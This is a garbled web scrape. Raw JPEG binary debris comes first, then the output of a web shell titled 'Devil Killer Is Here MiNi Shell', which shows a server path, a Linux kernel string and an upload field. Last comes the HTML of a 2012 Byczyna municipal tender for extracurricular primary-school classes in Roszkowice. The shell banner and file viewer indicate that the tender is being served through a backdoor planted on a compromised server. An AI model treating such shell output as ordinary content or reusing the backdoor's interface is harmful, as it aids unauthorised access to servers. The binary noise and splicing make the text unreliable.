JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120301/49177-N-2012.html

<p class="kh_header"><b>Byczyna: Nowe szanse - edukacja w szkołach podstawowych Gminy Byczyna, Etap III - PSP Roszkowice</b><br>
<b>Numer ogłoszenia: 49177 - 2012; data zamieszczenia: 01.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Byczyna z siedzibą w Urzędzie Miejskim w Byczynie , Rynek 1, 46-220 Byczyna, woj. opolskie, tel. 77 413 41 50, faks 77 413 41 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.byczyna.pl, www.byczyna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nowe szanse - edukacja w szkołach podstawowych Gminy Byczyna, Etap III - PSP Roszkowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest Prowadzenie zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego dla uczniów klas I-III szkół podstawowych na terenie Gminy Byczyna w ramach projektu pt. Nowe szanse - edukacja w szkołach podstawowych Gminy Byczyna.
Zamawiający wymaga, aby kompleksowa realizacji każdej z części zamówienia przeprowadzana była przez osobę prowadzącą zajęcia (bądź przez Wykonawcę, który jest jednocześnie osobą prowadzącą zajęcia), czyli przez osobę wskazaną w Załączniku nr 5 - Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia. Będą to w szczególności następujące czynności:
1)Opracowania w oparciu o wytyczne przekazane przez Zamawiającego, w uzgodnieniu z Dyrektorem PSP w Roszkowicach:
- programu nauczania dla przydzielonej grupy uczniów (program nauczania może ulec zmianie i aktualizacji w zależności od wyników przeprowadzanych testów diagnostycznych i/lub zmiany siatki godzinowej PSP w Roszkowicach), 
	- przeprowadzenia zajęć pozalekcyjnych na podstawie programu nauczania,
2)	Przekazania Zamawiającemu do akceptacji programu zajęć w terminie do 3 dni od dnia zawarcia Umowy,
3)	Zmiany i aktualizacji planu zajęć w zależności od wyników przeprowadzanych testów diagnostycznych i/lub zmiany siatki godzinowej PSP w Roszkowicach i przekazaniu zmienionego planu zajęć w terminie 3 dni od dnia zaistnienia okoliczności, powodujących zmiany w planie zajęć, 
4)	Monitorowanie udziału uczestników oraz prowadzenia dokumentacji zajęć, w szczególności:
-prowadzenia dziennika zajęć wraz z lista obecności - na każdych zajęciach,
-zebranie od uczniów deklaracji uczestnika - na pierwszych zajęciach,
-dokumentacji z przeprowadzonych testów diagnostycznych,
-karty obserwacji ucznia.
5)	Przeprowadzenia testów diagnostycznych (pierwszy test przed rozpoczęciem zajęć, następne po ukończeniu kolejnego semestru i roku szkolnego)
6)	Zapewnienia bezpieczeństwa uczniów podczas zajęć pozalekcyjnych,
7)	Oznaczenia wszelkiej dokumentacji związanej z realizacją Umowy, zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczenia Projektów w ramach Programu Operacyjnego Kapitał Ludzki.
Zamówienie składa się z  7 części, w tym: 
I)	zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu (zajęcia specjalistyczne), 
II)	zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych (zajęcia specjalistyczne),
III)	zajęcia z gimnastyki korekcyjnej (zajęcia specjalistyczne),
IV)	zajęcia korekcyjno - kompensacyjne (zajęcia specjalistyczne),
V)	zajęcia kółka przyrodniczo - ekologicznego (zajęcia rozwijające uzdolnienia),
VI)	zajęcia humanistyczne (zajęcia rozwijające uzdolnienia),
VII)	zajęcia matematyczne (zajęcia rozwijające uzdolnienia).
Realizacja zajęć odbywać się będzie na podstawie programu nauczania opracowanego przez Wykonawcę, z uwzględnieniem higieny pracy uczniów, w uzgodnieniu z dyrektorem szkoły, na terenie której odbywać się będą zajęcia. 
Zajęcia odbywać się będą zarówno w godzinach przedpołudniowych (od 8.00) jak i popołudniowych (do 16.00 w wyjątkowych sytuacjach do 19.00), w siatce godzin lekcyjnych PSP w Roszkowicach.
.2. Szczegółowy Opis przedmiotu 

Część I 
Zajęcia specjalistyczne dla dzieci z trudnościami w pisaniu i czytaniu

Zajęcia te odbywać się mają  w 3 etapach pracy. Etap wstępny obejmuje ćwiczenia stymulujące i korekcyjne zaburzonych funkcji percepcyjno - motorycznych i ich koordynacji w formie zabaw i gier na materiale konkretnym 
i słownym oraz intensywne działania psychoterapeutyczne. W etapie drugim przechodzi się do operowania materiałem dydaktycznym, literowym i wyrazowym w różnorodnych ćwiczeniach usprawniających umiejętność czytania i pisania. Etap trzeci uwzględnia dalsze prowadzenie ćwiczeń korekcyjno - kompensacyjnych, usprawniających funkcję słuchową i wzrokową, kinetyczno - ruchową, oraz ich koordynację w czasie czytania i pisania. Celem tych ćwiczeń jest opanowanie umiejętności poprawnego czytania i pisania poprzez eliminowanie dysortografii tj. charakterystycznych błędów ortograficznych związanych ze specyfiką pisowni polskiej.

Część II
Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych

Celem zajęć jest wyrównywanie braków w wiadomościach i umiejętnościach matematycznych uczniów, dla których te braki są przyczyną niepowodzeń szkolnych. Specyfika zajęć oraz ich atrakcyjność (np. nauka przez zabawę) mają umożliwić niwelowanie trudności, trenować umiejętność skupienia się na zadaniu, zwiększać motywację do pokonywania trudności. Ryzyko porażki na lekcji w klasie staje się (główny cel zajęć) znacznie mniejsze. Zajęcia muszą przewidywać: indywidualizację, stopniowanie trudności, rozwijanie zainteresowań, różnorodność wykonywanych zadań, wyzwalanie twórczej aktywności pozwoli uczniom lepiej funkcjonować w zespołach klasowych. Istotna jest znajomość zakwalifikowanych uczestników i bardzo dokładne zdiagnozowanie ich braków edukacyjnych.

Część III
Zajęcia z gimnastyki korekcyjnej 

Efektem zajęć ma być nabycie przez uczestników nawyku prawidłowej postawy ciała oraz świadomość istotnej roli prawidłowej postawy dla zdrowia i rozwoju. Program zajęć powinien być dostosowany do korygowania wad postawy u dzieci i młodzieży. Powinien zawierać również instruktaż ćwiczeń domowych, dobór ćwiczeń do indywidualnych potrzeb ćwiczących, zgodnie ze wskazaniami lekarskimi wynikającymi z istniejącej wady postawy.

Część IV
Zajęcia korekcyjno - kompensacyjne

Zajęcia przeznaczone są dla uczniów ze specyficznymi trudnościami w uczeniu się i zachowaniu. Celem zajęć jest praca nad relacjami uczniów w grupie rówieśniczej oraz relacjami w kontaktach uczeń- nauczyciel. Zajęcia korekcyjno- kompensacyjne wymagają gruntownej znajomości środowiska domowego uczniów, współpracy z rodzicami, opiekunami dzieci oraz znajomości trudności dziecka, indywidualizacji pracy przy jednoczesnym wdrażaniu w umiejętności pracy w zespole klasowym. Korygowanie zachowań oraz niwelowanie trudności w uczeniu
się ma pozwolić uczestnikom na osiąganie sukcesów na miarę swoich możliwości w zespole klasowym.
Ze względu na specyfikę zajęć prowadzący muszą legitymować się wykształceniem wyższym pedagogicznym, doświadczeniem w zakresie kształcenia umiejętności społecznych najmłodszych, posiadać kwalifikacje w zakresie rewalidacji lub oligofrenopedagogiki lub terapii pedagogicznej. Niezbędna jest znajomość środowiska uczniów zakwalifikowanych na zajęcia, gruntowna diagnoza trudności oraz dobór odpowiednich metod terapeutycznych.

Część V
Zajęcia w ramach kółka przyrodniczo- ekologicznego

Celem tych zajęć jest skuteczne i efektywne kształtowanie postaw dzieci zgodnych z edukacją ekologiczną. Program zajęć powinien  służyć  pogłębianiu i poznawaniu nowej wiedzy, pobudzaniu aktywności dzieci, twórczemu myśleniu. Uczyć współdziałania w zespole, kształtować właściwe postawy. Pomagać dzieciom w ciekawy i pożyteczny sposób spędzać wolny czas. Rozwijać zainteresowania.

Część VI
Zajęcia humanistyczne

W ogólnych założeniach praca z uczniem zdolnym humanistycznie ma na celu rozwijanie jego zdolności
i zainteresowań. Są to działania nastawione na pobudzanie aktywności uczniów, wyobraźni, fantazji, motywowanie uczniów do wykorzystania swoich uzdolnień do dalszej pracy, przyzwyczajanie uczniów do samodzielnego rozwiązywania problemów, z wykorzystaniem posiadanej wiedzy, doskonalenie koncentracji uwagi, kształcenie pomysłowości, krytycyzmu, rozbudzanie ciekawości poznawczej, twórczego działania i samodzielności, przygotowanie uczniów do konkursów. Ww. cele umożliwiają dzieciom wyzwolenie aktywności twórczej, gromadzenie doświadczeń i przeżyć estetycznych, artystycznych i społecznych. Rozwijają wyobraźnię dziecka i jego kreatywność. Wpływają na rozwój jego osobowości, umożliwiają wypowiedź w różnych rodzajach ekspresji.

Część VII
Zajęcia matematyczne 

W ogólnych założeniach praca z uczniem zdolnym matematycznie ma na celu rozwijanie jego zdolności i zainteresowań. Są to działania nastawione na pobudzanie aktywności umysłowej uczniów, wyobraźni, motywowanie uczniów do wykorzystania swoich uzdolnień do dalszej pracy, przyzwyczajanie uczniów do samodzielnego rozwiązywania problemów, z wykorzystaniem posiadanej wiedzy, doskonalenie koncentracji uwagi, kształcenie pomysłowości, krytycyzmu, szybkości podejmowania decyzji, rozbudzanie ciekawości poznawczej, twórczego działania i samodzielności, przygotowanie uczniów do konkursów. Ww. cele umożliwiają dzieciom wyzwolenie aktywności twórczej. Rozwijają wyobraźnię dziecka i jego kreatywność. Wpływają na rozwój jego osobowości.

Nr Części/Rodzaj zajęć/Liczba Godz. w 2012 r.	/Liczba Godz. w 2013 r./Liczba
uczniów.
I/ Dla dzieci z trudnościami w czytaniu i pisaniu/ 	30/	-/	6.
II/	Dla dzieci z trudnościami matematycznymi/	30/	-/	6.
III/	Zajęcia z gimnastyki korekcyjnej/	42/	18/	12.
IV/	Zajęcia korekcyjno - kompensacyjne	/90/	-/	6, 3 grupy po 2 uczniów.
V	/Zajęcia kółka przyrodniczo - ekologicznego/	42/	18/	10.
VI/	Zajęcia humanistyczne	/30/	-/	3.
VII/	Zajęcia matematyczne/	30/	-	/3.
	Ogółem w ramach projektu	330	46.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie  oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie  oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie  oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeśli wykonawca dysponuje co najmniej jedną osobą zdolną do wykonania zamówienia dla każdej części zamówienia, na którą składa ofertę, posiadającą kwalifikacje do zajmowania stanowiska nauczyciela w szkole podstawowej określone w Rozporządzeniu Ministra Edukacji Narodowej 
z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji, wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50 poz. 400), 

a dodatkowo osoba zdolna do wykonania zamówienia posiada (Wymagane wykształcenie, doświadczenie i kwalifikacje dla poszczególnych części):
Część I:
-co najmniej 2 letnią praktykę w pracy z uczniami z trudnościami
 w czytaniu i pisaniu,
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy w edukacji wczesnoszkolnej,
-znajomość pracy metodą 18 struktur wyrazowych,
-ukończony kurs o dyslekcji lub kurs terapii pedagogicznej.
Część II:
-co najmniej 2 letnią praktykę w pracy z uczniami z trudnościami matematycznymi, 
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy w edukacji wczesnoszkolnej.
Część III:
-kwalifikacje do prowadzenia zajęć z gimnastyki korekcyjnej,
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy i doświadczenie w pracy z dziećmi z wadami postawy.
Część IV:
-kwalifikacje w zakresie:
1/	rewalidacji lub
2/	oligofrenopedagogiki lub 
3/	terapii pedagogicznej,
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela.
Część V:
-co najmniej 5 letni staż pracy w szkole podstawowej na stanowisku nauczyciela, w tym 2 letni staż pracy w edukacji wczesnoszkolnej,
-co najmniej 2 letni staż pracy jako nauczyciel przyrody.
Część VI:
-co najmniej 5 letni staż pracy w szkole podstawowej, w tym co najmniej 2 lata pracy na stanowisku nauczyciela edukacji wczesnoszkolnej lub
-co najmniej 5 letni staż pracy w szkole podstawowej, w tym co najmniej 2 lata pracy na stanowisku nauczyciela języka polskiego w szkole podstawowej.
Część VII:
-co najmniej 5 letni staż pracy w szkole podstawowej, w tym co najmniej 2 lata pracy na stanowisku nauczyciela edukacji wczesnoszkolnej lub
-co najmniej 5 letni staż pracy w szkole podstawowej, w tym co najmniej 2 lata pracy na stanowisku nauczyciela matematyki w szkole podstawowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany  jest wykazać w sposób szczególny. Ocena spełniania powyższego warunku prowadzona będzie na podstawie oświadczenia załączonego do oferty /załącznik nr 2 do SIWZ/ zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	formularz oferty przetargowej /zał. nr 1do SIWZ/, 
b)	dokumenty potwierdzające uprawnienia osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.byczyna.pl, www.byczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Byczynie
ul. Rynek 1
46-220 Byczyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 10:00, miejsce: Urząd Miejski w Byczynie
ul. Rynek 1
46-220 Byczyna
sekretariat UM w Byczynie, (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest dofinansowany z Programu Operacyjnego Kapitał Ludzki.
Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach
Działanie: 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty
Poddziałanie: 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grupy o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zajęcia specjalistyczne dla dzieci z trudnościami w pisaniu i czytaniu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia te odbywać się mają  w 3 etapach pracy. Etap wstępny obejmuje ćwiczenia stymulujące i korekcyjne zaburzonych funkcji percepcyjno - motorycznych i ich koordynacji w formie zabaw i gier na materiale konkretnym 
i słownym oraz intensywne działania psychoterapeutyczne. W etapie drugim przechodzi się do operowania materiałem dydaktycznym, literowym i wyrazowym w różnorodnych ćwiczeniach usprawniających umiejętność czytania i pisania. Etap trzeci uwzględnia dalsze prowadzenie ćwiczeń korekcyjno - kompensacyjnych, usprawniających funkcję słuchową i wzrokową, kinetyczno - ruchową, oraz ich koordynację w czasie czytania 
i pisania. Celem tych ćwiczeń jest opanowanie umiejętności poprawnego czytania i pisania poprzez eliminowanie dysortografii tj. charakterystycznych błędów ortograficznych związanych ze specyfiką pisowni polskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.</p>
